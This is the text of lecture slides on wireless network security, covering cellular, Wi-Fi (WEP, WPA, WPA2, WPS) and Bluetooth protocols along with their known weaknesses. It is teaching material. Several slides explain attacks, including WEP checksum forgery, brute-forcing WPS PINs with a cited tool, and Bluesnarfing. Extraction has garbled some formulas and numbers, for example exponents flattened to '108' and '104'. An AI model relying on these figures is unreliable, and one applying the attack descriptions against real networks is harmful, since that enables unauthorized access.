Wireless Security
Related Chapters
• Chapter 15: Wireless Network Security
• Chapter 16: Wireless Sensor Network Security
• Chapter 17: Cellular Network Security
2
• InfraRed • BlueTooth (Piconet, PAN) • Wireless LAN
– 802.11a, 802.11b, 802.11g
• ZigBee – for home automation and
industrial control
• WiMAX – For rural area & MAN
• Mobile/Cell phone networks – Current and future generations
• Many more
Wireless Technologies
MAN Metropolitan Area Network
IEEE 02.16 WiMAX
2 miles (for “non line of
sight”
transmission)
4 MBPS (per user)
Wireless LAN IEEE 802.11
Wi-Fi 100 feet 150 MBPS
PAN Personal Area
Network
(1) IEEE 802.15 ZigBee (2) Bluetooth
30 feet (1) 0.25 MBPS (2) 3 MBPS
3
Wireless Networks
• A general term to refer to networks that communicate without the need of wire lines.
• 2 types of wireless networks:
– Cellular networks
– Wireless Ad Hoc networks.
• Main difference
– Cellular needs a fixed infrastructure, whereas Ad Hoc does not.
Wireless network
Cellular network
Wireless Ad Hoc
network
4
Cellular Networks
Figure 15.2
Cellular networking.
A cellular network comprises a fixed infrastructure and a number of mobile nodes. Mobile nodes
connect to the fixed infrastructure through wireless links. They may move around from within the
range of one base station to outside the range of the base station, and they can move into the
ranges of other base stations. 5
Cellular Networks (2)
• Fixed infrastructure and mobile nodes.
• The fixed infrastructure serves as the backbone of a cellular network.
• Mobile nodes do not communicate with each other directly without going through a base station.
• Require serious and careful topology design of the fixed infrastructures because of the static topology.
6
Main Cellular Technologies • GSM:
– Each GSM mobile phone uses a pair of frequency channels, with one channel for sending data and another for receiving data.
– Time division multiplexing (TDM) is used to share frequency pairs by multiple mobiles.
• CDMA: – allows each mobile to transmit over the
entire frequency spectrum at all times. – The core algorithm of CDMA is how to
extract data of interest from the mixed data.
• 4G LTE
Security
• Confidentiality – Such networks encryption the air link
• GSM
– Landlines are open
– NO CONFIDENTIALITY!
• User authentication – Main concern of operators
• It's all about money!
– WELL DONE, from business perspective
• Cell network authentication – Detect & prevent rogue cell towers
Cellular Phone Network Security
7
8
Rogue Cell Towers
Locations of rogue cell towers identified by GSMK Cryptophone in 8/2014
WI-FI SECURITY
9
802.11 Wireless LANs (Wi-Fi)
• Specified by the IEEE 802.11 series standard – as part of the specification for 802.11b in 1999 – range from 2 Mbits per second to 248 Mbits per second
• Two modes: Access point (AP) mode or ad hoc mode • Complications
– Medium access control in the data link layer • Distributed: relies on the Carrier Sense Multiple Access (CSMA) with
Collision Avoidance (CSMA/CA) protocol • Centralized: implemented by having base station broadcast a beacon
frame periodically and poll nodes to check whether they have data to send
10
Figure 15.3
(a) A wireless network in AP mode; (b) a wireless network in ad hoc mode.
When a wireless LAN is working in AP mode, all communication passes through a base station, called
an access point. The access point then passes the communication data to the destination node, if it is
connected to the access point, or forwards the communication data to a router for further routing and
relaying. When working in ad hoc mode, wireless LANs work in the absence of base stations. Nodes
directly communicate with other nodes within their transmission range, without depending on a base
station.
802.11 Wireless LAN Modes
11
802.11 Commonly-used sub protocols
Protocol 802.11a 802.11b 802.11g 802.11n 802.11ac 802.11ad
Frequency 5 GHz, licensed
2.4 GHz, unlicensed
2.4 & 5 GHz, both
2.4 & 5 GHz, both
5 GHz 2.4, 5 & 60 GHz
Range 50 m 50 m 50 m 70 m
Max. Data Rate
54 Mbps 11 Mbps 54 Mbps 150 Mbps 866 Mbps 6.75 Gbps
Modulation OFDM Direct sequ SS
OFDM, others
OFDM
Note 1999 1999 2003 2009 2013 Standards to be finalized in 2014
12
Security Provision
• Access Control / Authentication
– Ensure that your wireless infrastructure is not used
• Data Integrity
– Ensure that your data packets are not modified in transit.
• Confidentiality
– Ensure that the contents of your wireless traffic is not learned
Threats • Interception • Masquerading • Hijacking • DoS • Tracking • Theft • Unauthorized access • Insider attacks • Device replacement • Over powering or jamming • (tapping land lines !)
802.11 Security Provision & Threats
13
Security Protocols
• Wired Equivalent Privacy (WEP)
• Wi-Fi Protected Access (WPA)
• WPA2
• Key management for Wi-Fi in large organizations
WEP
1999
WPA
2003
WPA
2004
14
Wired Equivalent Privacy (WEP)
• Defined by the IEEE 802.11 standard.
• Designed to protect linkage-level data for wireless transmission.
• Provides confidentiality, access control, and data integrity.
• Provides secure communication between a mobile device and an access point in a 802.11 wireless LAN.
• Implemented based on shared key secrets and the RC4 stream cipher.
15
Figure 15.4
WEP implemented based on shared key secrets and the RC4 stream cipher, WEP’s encryption of a frame
includes two operations. It first produces a checksum of the data, and then it encrypts the plaintext and the checksum using RC4.
WEP encryption and decryption
16
Data Integrity Check
• WEP uses the CRC-32 checksum for message integrity – CRC-32 is common network technique to detect transmission errors
• Security Flaws: – CRC-32 is NOT a hash function!
– CRC is linear CRC(x y) = CRC(x) CRC(y)
– The linearity allows the attacker to modify a message without changing its CRC
• XOR payload of some value ∆X and then
• simply XOR the checksum with C(∆X)
17
Major Known Problems with WEP
• Default is insecure • Inadequate key management leads to possible
exploitation of – weak encryption/authentication/integrity (s.a. short 24-
bit IV, non-crypto CRC etc) – Static keys – Shared keys – Weaknesses of RC4
• one-sided auth only (AP is not authenticated by mobile devices)
• IP addresses can be forged ! 18 18
WEP WPA WPA2
• Wi-Fi Protected Access (WPA) – Targets both enterprise and consumers
– What improvements does WPA provide over WEP?
– Uses the Extensible Authentication Protocol (EAP) framework to conduct authentication
• WPA2 – TKIP and AES both mandatory
– Supports fast roaming of wireless clients migrating between wireless access points • Useful for time-sensitive applications
19
• Published in 2003 by the Wi-Fi Alliance – Based on an early version (draft 3)
of the IEEE 802.11i standard
• Three major objectives: – Address WEP’s problems – Make existing WEP hardware also
support WPA – Ensure WPA is compatible with
the 802.11i standard
• Still use the RC4 stream cipher for encryption
• Based on TKIP (Temporal Key Integrity Protocol)
WPA (Wi-Fi Protected Access)
20
WPA - Modes of Operation
• PSK (Pre-Shared Key) and Enterprise
– A “shared secret” is used for authentication to access point vulnerable to dictionary attacks
– No need of an authentication server
• Enterprise Mode:
– Requires an authentication server – RADIUS
– Use 802.1X for authentication
21
Temporal Key Integrity Protocol
• Responsible for generating the encryption key, encrypting the message and verifying its integrity
• Dynamically changes key as system is used
• Encryption key is unique for every client
• Combined with larger IV to defeat known plain text attacks – 48 bit IV (Packet sequence number)
– WEP = 24 bit IV
22
Message Integrity Check (Michael)
• Uses the Michael algorithm to generate Message Integrity Code (MIC) – 8 bytes in length
– Used to enforce data integrity
• MIC is inserted in the TKIP packet
• The sender and the receiver each compute MIC and then compare. – MIC does not match implies the data is manipulated
– Detects potential packet content altercation due to transmission error or purposeful manipulation
• Includes a frame counter to prevent replay attacks
• More secure than CRC32
23
Attacks on WPA
• Dictionary attack on pre-shared key mode
• Michael Algorithm Vulnerability – Attacker creates a message and attaches a 64-bit binary string as a MIC
and tries to find the correct MIC without knowing the secret key
– Uses a differential cryptanalysis attack to find the correct MIC
• Denial of service attack – If WPA equipment sees two packets with invalid MICs in 1 second, then:
• All clients are disassociated.
• All activity stopped for one minute.
• So two malicious packets per minute is enough to stop a wireless network.
24
WPA2
• A long term solution specified by IEEE 802.11i
• Uses the same authentication process, 4-way handshake, and key hierarchy as WPA
• Replaces TKIP with the Advance Encryption Standard (AES) CCMP protocol – AES in Counter-Mode for encryption
– AES in Cipher Block Chaining-Message Authentication Code (CBC-MAC) for integrity checking
• Require replacement of hardware devices
25
Key Generation • Same key hierarchy as WPA
– 256-bit pairwise master key (PMK)
– Four 128-bit pairwise transient keys (PTKs)
– 384-bit temporal key for CCMP in each session • Pseudorandom number generated based on SMAC, SNonce,
AMAC, Anonce
• Exchanged following the 4-way handshake protocol
• Divided into three 128-bit transient keys: – Two for connection between STA and AP
– One as a session key for AES-128
26
CCMP Encryption and MIC
• Encryption: Ctr = Ctr0
Ci = AES-128K (Ctr + 1) Mi
i = 1, 2, …, k
• Authentication and integrity check:
Ci = 0128
Ci = AES-128K (Ci–1 Mi)
i = 1, 2, …, k
27
Flawed WPS
• Wi-Fi Protected Setup (WPS) is a simplified setup for Wi-Fi security with a hardwired 8-digit PIN – 8th digit is checksum 7 effective digits
• Flaws with "external registrar": – When client supplied PIN fails during config, router sends back EAP-
NACK which allows client to infer if 1st half of the PIN is correct – Allows evil client to reduce # of attempts needed to brute force guess
the PIN: from 108 to 104 + 103 = 11,000 attempts in total ( succeed in guessing in a few hours)
• Ref: – US-CERT Vulnerability Note VU#723755 – http://code.google.com/p/reaver-wps/
28
Common Sense Security Measures • Don’t use it unless you have to • Proper configuration of AP (incl. change default
passwords, limit physical access etc) • Turn on encryption mode with WPA2 • Limit the radio coverage • Mask/disable SSID broadcasting if possible • Set up a list of acceptable MAC addresses • Rotate keys regularly if feasible • Turn off radio if not in use
29 29
LI-FI (LIGHT FIDELITY) --- THE NEXT WAVE ?
30
Features of Li-Fi
• Visible light communication – Line of sight (typically)
• Using light-emitting diodes (LEDs) • High speed switching
at nanoseconds • Data rates > 10 Gbps !
– 250 times as fast as typical broadband
• Weaving the future "Internet of Things" • Expected to be more secure than Wi-Fi • Transmitting data while illuminating the room!
31
BLUETOOTH SECURITY
32
BlueTooth (Piconet)
• First proposed by Intel, Ericsson, IBM, Toshiba & Nokia in 1998.
• Self-configured and self-organized ad-hoc wireless networks – low power consumption – within a short range (1-50 meters)
• Essentially it is a mini wireless network between communicating nodes called Piconet. – allows one master device to interconnect with up to seven
active slave devices
33
Security Concerns
• Authentication and encryption is provided at the Link Manager layer.
• The PIN is translated into a 128 bit link key which is used for authentication.
• After authentication the radios will settle on a suitable length encryption key to be used.
• Bluetooth relies on PIN codes to establish trusted relationships between devices.
34
Bluetooth Key Generation
35
Bluetooth Authentication
36
Encryption Modes
• Mode 1: No encryption on any traffic
• Mode 2: Broadcast traffic (unencrypted) Individual Traffic encrypted with individual link keys
• Mode 3: All traffic encrypted according to master link key
37
General attacks
• Attack on Authentication
– due to the PIN weakness
– authentication is based on a PIN (8-128 bits)
– a poorly chosen can be easy to guess
• Attack on Encryption
– Bluetooth supports encryption, but it's off by default, and the password is 0000 by default
– plain text attack
– stealing the unit key
• Attack on Communication
– steals information of valid users’ devices and uses it to impersonate the user
Other attacks • Bluejacking
– discover nearby devices and send unsolicited messages
– spam of Bluetooth devices • Bluesnarfing
– hacks into a Bluetooth enabled phone and copying anything stored in the memory.
• Denial-of-service (DoS) attacks – flood a Bluetooth device with so many
frames that it is unable to communicate • The Cabir Worm
– seeks out and infects Bluetooth devices, but has to be manually accepted and installed.
• Backdooring – allows the attacker to monitor activity and
exploit services without the owner’s knowledge
Attacks on BlueTooth
38